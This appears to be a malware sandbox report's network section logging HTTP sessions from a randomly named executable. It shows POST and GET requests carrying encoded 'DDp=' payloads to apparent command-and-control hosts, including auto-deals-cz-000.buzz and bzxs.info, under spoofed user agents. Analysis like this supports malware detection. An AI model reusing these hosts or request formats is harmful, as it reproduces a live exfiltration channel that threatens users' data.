                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
                                                                                                        set-cookie: parking_session=c5eedf0a-25aa-4adc-80bb-27a5705dd974; expires=Wed, 06 Nov 2024 07:57:33 GMT; path=/
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 57 34 43 42 6f 61 33 58 65 33 56 77 74 72 4a 4b 61 4e 46 7a 34 34 69 74 6d 57 58 66 49 47 44 38 44 57 4d 5a 34 77 5a 5a 53 47 7a 61 76 73 79 37 6f 66 76 4a 7a 49 79 64 4e 6c 4b 46 53 47 49 38 76 39 57 45 42 68 74 41 41 2f 6b 36 62 42 61 79 4f 6d 4b 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                        Nov 6, 2024 08:42:33.416104078 CET611INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzVlZWRmMGEtMjVhYS00YWRjLTgwYmItMjdhNTcwNWRkOTc0IiwicGFnZV90aW1lIjoxNzMwODc4OT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        47192.168.2.650032199.59.243.227804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:35.343238115 CET1874OUTPOST /geci/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.auto-deals-cz-000.buzz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.auto-deals-cz-000.buzz
                                                                                                        Referer: http://www.auto-deals-cz-000.buzz/geci/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 44 57 30 30 66 36 69 37 6f 55 49 51 54 43 4a 2f 37 33 69 62 61 36 41 47 70 30 32 79 68 7a 70 69 49 77 7a 66 61 4f 38 55 73 44 35 4c 4c 35 42 57 4d 50 63 4e 59 5a 68 6f 2b 45 74 53 58 67 49 5a 76 58 47 36 51 49 74 51 30 65 4c 4f 61 33 64 44 37 2f 7a 50 2b 56 55 79 53 59 68 31 36 63 56 5a 4e 67 2b 41 50 68 2f 79 48 48 64 52 38 44 38 56 63 4d 36 65 53 76 30 78 41 6c 5a 34 46 36 51 49 66 5a 43 65 59 78 63 57 31 30 74 38 78 69 68 6b 4d 30 43 42 38 75 57 65 34 45 41 4c 4b 6e 31 43 67 48 6a 4e 42 63 2b 72 2b 6f 33 6f 50 61 4e 59 4f 68 6a 59 73 62 47 62 6f 45 71 7a 49 6f 7a 74 58 39 67 31 31 33 71 48 42 6e 76 31 42 49 51 33 4d 34 70 73 78 7a 56 71 5a 7a 77 65 53 75 42 46 72 66 47 65 4a 33 66 4c 31 6e 2f 66 37 57 59 54 57 6b 73 74 65 35 5a 6d 59 66 36 50 2b 2f 63 57 4a 6b 48 2b 30 55 31 6b 4f 6d 44 6c 6f 4b 48 76 36 32 44 41 30 6c 73 6c 7a 65 62 63 6e 47 56 4c 73 73 2f 76 4b 78 57 56 72 4e 6b 64 64 33 55 69 4c 69 44 64 37 54 56 5a 45 73 50 4e 66 33 76 6a 46 38 2f 64 34 36 78 32 78 31 64 72 32 43 [TRUNCATED]
                                                                                                        Data Ascii: DDp=DW00f6i7oUIQTCJ/73iba6AGp02yhzpiIwzfaO8UsD5LL5BWMPcNYZho+EtSXgIZvXG6QItQ0eLOa3dD7/zP+VUySYh16cVZNg+APh/yHHdR8D8VcM6eSv0xAlZ4F6QIfZCeYxcW10t8xihkM0CB8uWe4EALKn1CgHjNBc+r+o3oPaNYOhjYsbGboEqzIoztX9g113qHBnv1BIQ3M4psxzVqZzweSuBFrfGeJ3fL1n/f7WYTWkste5ZmYf6P+/cWJkH+0U1kOmDloKHv62DA0lslzebcnGVLss/vKxWVrNkdd3UiLiDd7TVZEsPNf3vjF8/d46x2x1dr2CctfaadxQ+HZzXeYI+5e0t/1xc37MQ5rukzS6uN7e2Pxy4o1EUbWUP10AK/TuI1injJGlQxo5ZyoZcebJI8zQcdTDXdLroU90X2q/NXGjAtsyB9UA2XHHnBzOSEcUBNXE+FiKdzTxZaf9SSmvdMc2yJNUpUOKZZ7g6AhjOdWGhqtoQ+VRShMDHB+t8ElXjbfunye86W/4XkKSVZYf4xRxs6eq2Mmi1lvGqHWhD4/OmEYHP6Vk2nnw3ADYbkn7XHZ7ipfiGRffReGCaktUYQOtoxjaDRU5YG68vaiVeq53jArSx6FBJQnVakE2Tuky6ypCTppwReLOHOzH6LxKrrcuup5nuz8My0I8jnfomhr5uq5KbocTkF+7pNRKUpIsJ8+x0t7c+3Kdkm2jg+kJT7OFnvmFpCiaMIjBLvY9ciKodGepXFrBVitURpc6OQoPa7OjESWZCXFUrCK6p8BCbHRWS6kupOK5LT5+sqsO/2ffZ4UL18IYL7kkJvHN7DyRJtsoVyfUU3E8zMtGMNP+KHQkuh9dBDlnVlLW8z0LOpwiMR5TjCx5W3V6f8bP8EnbSct8tHO+Cbr+kNAorbCVrrUo5MIsBrmklucnHKZmJRZt5MDUw+SBECaXK0w4daD5KPXdXqhEZ+6dgNcPZU7e64zElQmAEa2C6O0Qgq [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:35.969959021 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:42:35 GMT
                                                                                                        content-type: text/html; charset=utf-8
                                                                                                        content-length: 1158
                                                                                                        x-request-id: a7000474-fca9-4b0c-94e6-83dbf10ed818
                                                                                                        cache-control: no-store, max-age=0
                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
                                                                                                        set-cookie: parking_session=a7000474-fca9-4b0c-94e6-83dbf10ed818; expires=Wed, 06 Nov 2024 07:57:35 GMT; path=/
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 57 34 43 42 6f 61 33 58 65 33 56 77 74 72 4a 4b 61 4e 46 7a 34 34 69 74 6d 57 58 66 49 47 44 38 44 57 4d 5a 34 77 5a 5a 53 47 7a 61 76 73 79 37 6f 66 76 4a 7a 49 79 64 4e 6c 4b 46 53 47 49 38 76 39 57 45 42 68 74 41 41 2f 6b 36 62 42 61 79 4f 6d 4b 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                        Nov 6, 2024 08:42:35.969991922 CET611INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTcwMDA0NzQtZmNhOS00YjBjLTk0ZTYtODNkYmYxMGVkODE4IiwicGFnZV90aW1lIjoxNzMwODc4OT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        48192.168.2.650033199.59.243.227804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:37.893212080 CET559OUTGET /geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.auto-deals-cz-000.buzz
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:42:38.519113064 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:42:38 GMT
                                                                                                        content-type: text/html; charset=utf-8
                                                                                                        content-length: 1518
                                                                                                        x-request-id: 45198989-4ce8-455c-b4e2-352dd1c4d277
                                                                                                        cache-control: no-store, max-age=0
                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_axH+/K1799aoJvxPWN6oaQI68V4Fj/wRuDSyjO8F/Nk9XNyJKFUIzWYc4tbWgpSefk7jd+UVfhoy4nK3991IIw==
                                                                                                        set-cookie: parking_session=45198989-4ce8-455c-b4e2-352dd1c4d277; expires=Wed, 06 Nov 2024 07:57:38 GMT; path=/
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 78 48 2b 2f 4b 31 37 39 39 61 6f 4a 76 78 50 57 4e 36 6f 61 51 49 36 38 56 34 46 6a 2f 77 52 75 44 53 79 6a 4f 38 46 2f 4e 6b 39 58 4e 79 4a 4b 46 55 49 7a 57 59 63 34 74 62 57 67 70 53 65 66 6b 37 6a 64 2b 55 56 66 68 6f 79 34 6e 4b 33 39 39 31 49 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_axH+/K1799aoJvxPWN6oaQI68V4Fj/wRuDSyjO8F/Nk9XNyJKFUIzWYc4tbWgpSefk7jd+UVfhoy4nK3991IIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                        Nov 6, 2024 08:42:38.519882917 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDUxOTg5ODktNGNlOC00NTVjLWI0ZTItMzUyZGQxYzRkMjc3IiwicGFnZV90aW1lIjoxNzMwODc4OT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        49192.168.2.650034188.114.97.3804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:43.581168890 CET798OUTPOST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 43 62 75 6f 36 73 6e 6b 44 36 69 30 2f 64 79 50 74 47 54 70 66 4e 55 67 6b 6b 76 56 68 2f 64 37 62 4a 43 4e 4d 38 79 6f 79 6f 76 4f 46 6c 46 4e 46 64 30 48 4d 41 54 4f 66 79 50 67 7a 69 76 35 37 2f 54 76 36 4c 57 79 62 4a 74 72 4b 63 70 2b 61 50 47 7a 58 48 39 33 30 49 42 68 4b 71 69 47 7a 50 6c 32 63 52 33 41 47 4f 53 52 51 62 72 50 75 43 4d 69 2f 57 42 65 35 78 44 70 2b 41 49 2f 59 4e 73 37 6c 49 59 56 45 5a 5a 74 2b 54 4b 43 6b 48 72 33 73 69 72 2f 78 70 69 30 6a 56 58 36 6c 69 34 61 6e 44 43 56 70 4e 49 67 4e 33 34 5a 56 4d 37 77 51 39 49 7a 63 73 61 79 76 62 79 4a
                                                                                                        Data Ascii: DDp=FAcToKpjOSrSCbuo6snkD6i0/dyPtGTpfNUgkkvVh/d7bJCNM8yoyovOFlFNFd0HMATOfyPgziv57/Tv6LWybJtrKcp+aPGzXH930IBhKqiGzPl2cR3AGOSRQbrPuCMi/WBe5xDp+AI/YNs7lIYVEZZt+TKCkHr3sir/xpi0jVX6li4anDCVpNIgN34ZVM7wQ9IzcsayvbyJ
                                                                                                        Nov 6, 2024 08:42:44.565088987 CET846INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:44 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lB%2BN1uXOivaKzfKNUn104r4F4fgwJpWW3gdtvGHFAuph05SS7SUvjPONhStOE6MWDf4cAYta8t1ukeRPKgFy3J3dppkGsi00pKbHuPXwuc7NuFsuK0hxuLtVpkwAIz8v"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372d59cdc315f-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        50192.168.2.650035188.114.97.3804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:46.194065094 CET822OUTPOST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 4e 66 53 6f 34 4c 37 6b 46 61 69 72 77 39 79 50 6b 6d 54 79 66 4e 59 67 6b 67 33 46 69 4a 31 37 59 71 57 4e 4e 39 79 6f 31 6f 76 4f 4b 46 46 49 42 64 30 63 4d 41 65 74 66 77 62 67 7a 69 37 35 37 39 4c 76 36 34 2b 39 4a 70 74 70 43 38 70 38 45 2f 47 7a 58 48 39 33 30 4d 51 4b 4b 71 36 47 79 38 39 32 4f 43 76 44 4c 75 53 53 48 72 72 50 6b 53 4d 59 2f 57 42 5a 35 7a 33 44 2b 43 67 2f 59 4d 63 37 6c 61 67 53 4f 5a 59 48 68 44 4c 76 6f 43 65 42 68 44 47 4f 36 61 32 76 69 6c 66 53 70 30 6c 41 37 77 43 32 37 64 6f 69 4e 31 67 72 56 73 37 61 53 39 77 7a 4f 37 57 56 67 76 58 71 63 41 6c 6b 33 63 34 75 72 61 63 70 6e 59 57 48 62 38 6c 4c 63 51 3d 3d
                                                                                                        Data Ascii: DDp=FAcToKpjOSrSNfSo4L7kFairw9yPkmTyfNYgkg3FiJ17YqWNN9yo1ovOKFFIBd0cMAetfwbgzi7579Lv64+9JptpC8p8E/GzXH930MQKKq6Gy892OCvDLuSSHrrPkSMY/WBZ5z3D+Cg/YMc7lagSOZYHhDLvoCeBhDGO6a2vilfSp0lA7wC27doiN1grVs7aS9wzO7WVgvXqcAlk3c4uracpnYWHb8lLcQ==
                                                                                                        Nov 6, 2024 08:42:47.147092104 CET846INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:47 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HXpizlQy6sUmnjvUh58CprYt3ZfNDBQ0fpZohKKt4%2FQedrVdlkEn5RlcOsvpJVPFmOmDOr5Z7fphaVMplVUHwQAr82f4bK1it3RqyvNBZ7BC5GKoHAwdCgICSxhGI5J"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372e5b89de796-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        51192.168.2.650036188.114.97.3804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:48.732590914 CET1835OUTPOST /v58i/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.bzxs.info
                                                                                                        Referer: http://www.bzxs.info/v58i/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 46 41 63 54 6f 4b 70 6a 4f 53 72 53 4e 66 53 6f 34 4c 37 6b 46 61 69 72 77 39 79 50 6b 6d 54 79 66 4e 59 67 6b 67 33 46 69 4a 39 37 62 59 4f 4e 4d 66 61 6f 30 6f 76 4f 44 6c 46 4a 42 64 31 4d 4d 41 57 78 66 77 58 57 7a 67 44 35 36 63 72 76 38 4a 2b 39 43 70 74 70 4f 63 70 39 61 50 47 36 58 48 74 7a 30 49 30 4b 4b 71 36 47 79 36 35 32 4e 52 33 44 4a 75 53 52 51 62 72 44 75 43 4e 57 2f 51 70 76 35 7a 7a 35 2b 53 41 2f 57 4d 4d 37 6e 70 59 53 55 5a 5a 68 67 44 4c 33 6f 43 61 53 68 44 61 56 36 5a 71 56 69 69 76 53 72 53 46 5a 70 79 48 67 34 75 49 69 54 56 46 56 4d 59 79 71 56 75 67 4e 41 4e 61 66 6d 62 58 57 61 57 5a 54 31 50 35 4d 6b 4d 67 69 72 76 4f 58 56 5a 59 7a 49 76 4d 72 31 58 75 66 65 68 36 56 75 2f 49 33 4f 4f 63 6a 35 51 55 39 55 64 4c 4b 70 75 4c 6b 79 44 30 36 2f 59 59 50 49 53 75 46 32 46 78 33 79 65 4d 54 6b 6a 6c 43 73 56 34 32 4b 7a 48 4e 69 4e 76 54 38 64 59 7a 6b 76 62 76 2b 42 34 4e 2b 4c 4c 34 5a 78 46 61 6d 64 68 73 67 2f 57 2f 71 6c 77 55 71 42 78 6a 55 48 4f 71 65 56 [TRUNCATED]
